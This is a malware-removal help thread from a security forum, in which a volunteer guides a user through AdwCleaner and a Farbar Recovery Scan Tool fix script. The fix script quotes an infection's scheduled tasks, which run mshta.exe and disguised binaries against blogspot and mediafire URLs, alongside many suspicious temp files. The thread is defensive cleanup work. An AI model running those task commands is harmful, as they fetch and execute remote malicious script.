Read More Read More Read More Read More Read More EU draft law adds security
checks to allcrypto transactions 1/1 Skip Ad Continue watching after the ad
Visit Advertiser websiteGO TO PAGE
--------------------------------------------------------------------------------
#2 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 23 March 2022 - 09:29 AM
Greetings Karin and to BleepingComputer's Virus/Trojan/Spyware/Malware Removal
forum.
My name is Oh My! and I am here to help you! Now that we are "friends" please
call me Gary.
===================================================
Ground Rules:
* First, please keep in mind most of us at BleepingComputer volunteer our
assistance for your benefit in your time of need. Please try to match our
commitment to you with your patience toward us.
* It is important to not run any tools or take any steps other than those I
will provide for you.
* Please perform all steps in the order they are listed. If things are not
clear or you experience problems be sure to stop and let me know.
* Please copy and paste all logs into your post unless otherwise requested.
* When your computer is clean I will let you know, provide instructions to
remove tools and reports, and offer you information about how you can combat
future infections.
* If you do not reply to your topic after 5 days I will assume it has been
abandoned and I will close it.
===================================================
Now that I am assisting you, you can expect that I will be very responsive to
your situation. If you are able, I would request you check this thread at least
once per day so that we can try to resolve your issues effectively and
efficiently. If you are going to be delayed please be considerate and let me
know.
Please allow me some time to review what you have posted. I will be posting back
a bit later today.
Edited by Oh My!, 23 March 2022 - 09:31 AM.
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
#3 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 23 March 2022 - 09:36 AM
Thank you, Gary!!
I will be keeping this post up and constantly monitoring. At this point I have
fired up my back up laptop, downloaded needed files and hoping to minimize the
damage as much as possible.
* Back to top
--------------------------------------------------------------------------------
#4 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 23 March 2022 - 04:01 PM
Hi Karin.
Thank you for your patience.
Your computer is infected so let's start with this.
===================================================
Deleting Chrome Notifications
--------------------
* Launch Chrome
* In the address bar type chrome://settings/content/notifications and hit Enter
* Scroll down to Allowed to send notifications
* For any entry you are not familiar with or do not want click on the 3
horizontal dots to the right and select Remove
===================================================
Malwarebytes AdwCleaner
-------------------
* Please download AdwCleaner and save it to your Desktop
* Close all open programs and browsers
* Right click on the icon and select Run as administrator
* Click Scan now
* Allow the program to Quarantine what it finds except for Pre-installed
applications if you would like to keep those or other entries you would like
to keep
* When completed click View Scan Log File
* Copy and paste the contents in your reply
* Click Skip Basic Repair if it appears then close the program
===================================================
Farbar Recovery Scan Tool Fix
--------------------
* Right click on the FRST icon and select Run as administrator
* Highlight the below information then hit the Ctrl + C keys at the same time
and the text will be copied
* There is no need to paste the information anywhere, FRST will do it for you
Start::
CreateRestorePoint:
CloseProcesses:
Folder: C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision
Folder: C:\Users\Karin Hostetler\AppData\Local\mbam
HKLM-x32\...\Run: [HPUsageTrackingLEDM] => "C:\Program Files (x86)\HP\HP UT LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" (No File)
HKLM-x32\...\Run: [MobisynapseSyncHelper] => C:\Program Files (x86)\Mobisynapse\MobisynapseSyncHelper.exe (No File)
HKLM-x32\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File)
HKLM-x32\...\Run: [DYMOWebApi] => "C:\Program Files (x86)\DYMO\DYMO Connect\DYMO.WebApi.Win.Host.exe" /auto (No File)
HKLM-x32\...\Run: [DLSService] => "C:\Program Files (x86)\DYMO\DYMO Label Software\DLSService.exe" (No File)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File)
Task: {058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8} - System32\Tasks\asdsdasdjikindasddeyu => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"]
Task: {27302AB8-5990-4AC3-BEB6-CF5627D88D26} - System32\Tasks\calendersw => "C:\ProgramData\ddond.com" [Argument = "https://www.mediafire.com/file/b1rg1ah1ulmvcmq/00Back.htm/file"]
Task: {4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {53FC2A34-956B-4691-8FCB-DA0D66138CBD} - System32\Tasks\asdaddddasdadsddasdeyu => "C:\Windows\System32\mshta.exe" "hxxps://mainnewstart1mob.blogspot.com/atom.xml"
Task: {C897E049-5067-41C4-8F4C-CB5C6B419D54} - System32\Tasks\microWord => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"]
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp
2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp
2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp
2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp
2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp
2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp
2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp
2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp
2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp
2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp
2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp
2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp
2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp
2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp
2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp
2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp
2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp
2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp
2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp
2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp
2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp
2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp
2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp
2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp
2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp
2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp
2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp
2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp
2022-03-22 16:19 - 2022-03-23 08:05 - 000003754 _____ C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu
2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp
2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp
2022-03-22 14:53 - 2022-03-22 14:53 - 000003770 _____ C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu
2022-03-22 14:53 - 2020-10-14 07:54 - 000452608 _____ (Microsoft Corporation) C:\ProgramData\timagar.com
2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp
2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp
2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp
2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp
2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp
2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp
2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp
2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp
2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp
2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp
2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp
2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp
2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\mbam
2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp
2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp
2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp
2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp
2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp
2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp
2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp
2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp
2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp
2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp
2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp
2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp
2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp
2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp
2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp
2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp
2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp
2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp
2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp
2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp
2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp
2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp
2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp
2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp
2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp
2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp
2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp
2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp
2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp
2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp
2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp
2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp
2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp
2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp
2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp
2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp
2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp
2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp
2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp
2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp
2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp
2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp
2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp
2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp
2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp
2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp
2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp
2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp
2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp
2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp
2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp
2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp
2022-03-21 16:47 - 2022-03-23 08:25 - 000003730 _____ C:\WINDOWS\system32\Tasks\microWord
2022-03-21 15:25 - 2022-03-21 15:25 - 000003768 _____ C:\WINDOWS\system32\Tasks\calendersw
2022-03-21 15:25 - 2020-10-14 07:54 - 000433152 _____ (Microsoft Corporation) C:\ProgramData\ESETNONU.com
2022-03-21 15:25 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\milon.com
2022-03-21 15:24 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation) C:\ProgramData\ddond.com
2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp
2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp
2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp
2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp
2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp
2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp
2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.r.ubyg.tmp
2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.tyCkte.tmp
2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp
2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp
2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp
2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp
2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp
2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp
2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp
2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp
2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp
2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\BvqpwdK.tmp
2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\bwyFtJD.tmp
2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp
2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cbmkybA.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CFCbraa.tmp
2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CisKbHh.tmp
2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp
2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\CrKgBBd.tmp
2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp
2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp
2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp
2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp
2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp
2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp
2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp
2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp
2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp
2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp
2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp
2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp
2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp
2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp
2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp
2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp
2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp
2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp
2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp
2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp
2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp
2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp
2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp
2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp
2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp
2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp
2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp
2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp
2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp
2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp
2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp
2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp
2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp
2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp
2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp
2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp
2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp
2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp
2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp
2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp
2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp
2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp
